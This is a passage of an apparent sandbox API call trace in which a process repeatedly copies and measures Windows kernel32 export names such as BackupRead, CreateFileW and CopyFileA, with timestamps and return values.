| out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.984] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.984] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.984] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.984] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.984] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.984] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.984] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.984] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.984] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.984] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.984] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.984] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.984] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.985] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.985] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.985] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.985] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.985] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.985] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.985] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.985] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.995] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.995] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.995] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.995] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.995] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.995] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.995] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.996] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.996] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.996] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.996] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.996] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.996] lstrlenA (lpString="BEEP") returned 4 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.996] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.996] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.996] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.996] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.996] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.996] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.996] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.996] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.996] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.996] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.996] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.996] lstrlenA (lpString="CANCELIO") returned 8 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.997] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.997] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.997] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.997] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.997] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.997] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.997] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.997] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.997] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.997] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.997] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.997] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.997] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.997] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.997] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.997] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.997] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.997] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.998] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.998] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.998] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.998] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.998] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.998] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.998] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.998] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.998] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.998] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.998] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.998] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.998] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.998] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.998] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.998] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.998] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.998] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.999] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.999] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.999] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.999] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.999] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.999] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.999] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.999] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.999] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.999] lstrlenA (lpString="COPYFILEA") returned 9 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.999] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.999] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.999] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.999] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.999] lstrlenA (lpString="COPYFILEW") returned 9 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.999] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.999] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.999] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.000] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.000] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.000] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.000] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.000] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.000] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.000] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.000] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.000] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.000] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.000] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.000] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.000] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.000] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.000] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.000] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.000] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.000] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.001] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.001] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.001] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.001] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.001] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.001] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: 